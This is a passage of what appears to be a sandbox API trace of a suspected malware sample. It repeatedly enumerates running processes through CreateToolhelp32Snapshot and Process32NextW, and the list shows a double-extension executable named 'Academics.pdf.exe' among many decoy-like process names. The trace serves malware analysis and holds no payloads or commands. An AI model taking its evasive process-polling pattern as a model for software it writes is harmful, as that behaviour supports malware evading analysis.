[0314.384] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0314.384] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0314.385] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0314.386] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0314.387] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0314.387] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0314.388] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0314.389] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0314.390] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0314.391] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0314.391] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0314.392] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0314.393] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0314.394] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0314.395] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0314.395] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0314.396] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0314.397] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0314.398] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0314.398] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.399] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0314.400] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.401] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0314.402] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0314.402] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0314.403] CloseHandle (hObject=0x294) returned 1 [0314.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0314.404] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.404] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.404] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0314.406] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0314.407] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0314.407] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0314.408] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0314.409] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0314.410] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0314.411] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0314.411] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0314.412] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0314.413] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0314.414] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.415] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.416] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.416] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.417] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.418] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0314.419] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.420] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.420] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0314.421] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0314.422] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0314.423] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0314.424] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.424] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0314.425] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0314.426] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0314.427] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0314.428] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0314.428] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0314.429] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0314.430] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0314.431] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0314.432] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0314.433] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0314.434] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0314.435] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0314.435] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0314.436] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0314.437] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0314.438] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0314.439] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0314.439] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0314.440] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.441] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0314.442] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.443] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0314.444] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0314.444] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0314.445] CloseHandle (hObject=0x294) returned 1 [0314.445] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.446] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.446] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0314.448] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0314.448] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0314.449] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0314.450] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0314.451] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0314.452] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0314.452] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0314.453] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, 